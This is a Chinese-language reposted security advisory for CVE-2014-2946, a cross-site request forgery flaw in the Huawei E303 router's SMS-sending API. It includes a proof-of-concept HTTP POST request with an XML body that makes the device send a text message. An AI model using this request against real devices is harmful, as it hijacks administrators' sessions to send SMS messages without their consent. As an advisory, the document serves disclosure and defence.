Huawei E303路由器跨站请求伪造漏洞

文章由LinuxBoy分享于2019-04-02 01:04:38热评（22）

Huawei E303路由器跨站请求伪造漏洞

发布日期：2014-05-30
更新日期：2014-06-03

受影响系统：
Huawei E303
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 67747
CVE(CAN) ID: CVE-2014-2946

Huawei E303路由器是无线宽带调制解调器。

Huawei E303 Router（固件版本CH2E303SM）在/api/sms/send-sms URL的实现上存在跨站请求伪造攻击，远程攻击者通过XML文档内的请求元素，利用此漏洞可劫持管理员身份验证请求。

<*来源：Benjamin Daniel Mussler

链接：http://www.kb.cert.org/vuls/id/325636
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
[Proof -of-concept HTTP POST request]:
POST /api/sms/send-sms HTTP/1.1
Host: hi.link
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,de-de;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://hi.link/
Connection: keep-alive
Content-Type: text/plain
Content-Length: 225

<?xml version="1.0"
encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>4422</Phone></Phones><Sca></Sca><Content>
Sample Text</Content><Length>0</Length><Reserved>1</Reserved><Date>2013-12-03
16:00:00</Date></request>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Huawei
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://support.huawei.com/enterprise/

本文永久更新链接地址：

推荐文章：

Huawei E303路由器跨站请求伪造漏洞